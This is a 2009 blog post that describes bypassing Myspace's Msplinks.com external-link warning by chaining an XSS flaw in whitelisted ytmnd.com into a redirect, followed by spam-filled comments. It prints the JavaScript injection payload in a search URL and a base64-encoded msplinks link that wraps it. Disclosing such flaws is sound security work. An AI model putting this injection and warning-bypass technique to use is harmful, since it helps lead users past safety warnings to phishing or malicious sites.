This site is soon to be deprecated by http://www.johnleitch.net

Sunday, June 21, 2009

Bypassing Msplinks.com Notifications - Myspace.com

As a preventative measure Myspace.com routes all user posted links through Msplinks.com. If the linked site is not on the msplinks whitelist a notification that the user is visiting an external site is displayed, and the the user must click another link to continue. To circumvent this system, an XSS vulnerability in a whitelisted site can be used as a redirect.



Fortunately ytmnd.com has a vulnerability. By prepending 01 to an xss redirect url, base64 encoding the result, and appending it to http://www.msplinks.com/ we can create a link that can be posted on Myspace. When the user clicks this link, no external site warnings are displayed.

The vulnerable whitelisted site:
http://www.ytmnd.com/search?q="]}}};window.location='http://www.asdf.com/';{{{//

A msplinks link that redirects to the xss redirect:
http://www.msplinks.com/MDFodHRwOi8vd3d3Lnl0bW5kLmNvbS9zZWFyY2g/cT0lMjIlNUQlN0QlN0QlN0Q7d2luZG93LmxvY2F0aW9uPSdodHRwOi8vd3d3LmFzZGYuY29tLyc7JTdCJTdCJTdCLy8=

6 comments:

  1. That is smart as hell, must give credit where it is due.

    ReplyDelete
  2. radio imagingWedding Weight Loss Tips

    thank you for the warning. I will try to correct and prevent it ...:)

    ReplyDelete
  3. It is great to have visited your website. Thanks for sharing useful information. And also visit my website about health. God willing it will be useful too

    Cara Menghilangkan Melasma di Wajah
    Pengobatan Alternatif Penyakit Parkinson
    Cara Mengatasi Parotitis atau Gondong

    ReplyDelete
  4. replica bags paypal gucci replica m1f96p5y86 7a replica bags wholesale replica bags high quality look at this website t7b25r1m39 louis vuitton replica bags neverfull Bonuses o3l33b4x70 best replica designer bags replica bags uk f6g12g4n37

    ReplyDelete